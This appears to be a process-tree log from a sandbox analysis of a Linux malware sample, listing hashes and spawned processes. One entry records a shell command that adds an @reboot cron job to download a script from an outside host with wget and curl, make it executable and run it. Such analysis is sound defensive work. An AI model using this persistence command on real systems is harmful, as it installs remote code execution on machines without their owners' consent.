                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/tmp/nshkppc.elf
                                                                  Arguments:-
                                                                  File size:5388968 bytes
                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -l
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/tmp/nshkppc.elf
                                                                  Arguments:-
                                                                  File size:5388968 bytes
                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                  Start time (UTC):23:02:56
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/tmp/nshkppc.elf
                                                                  Arguments:-
                                                                  File size:5388968 bytes
                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/tmp/nshkppc.elf
                                                                  Arguments:-
                                                                  File size:5388968 bytes
                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6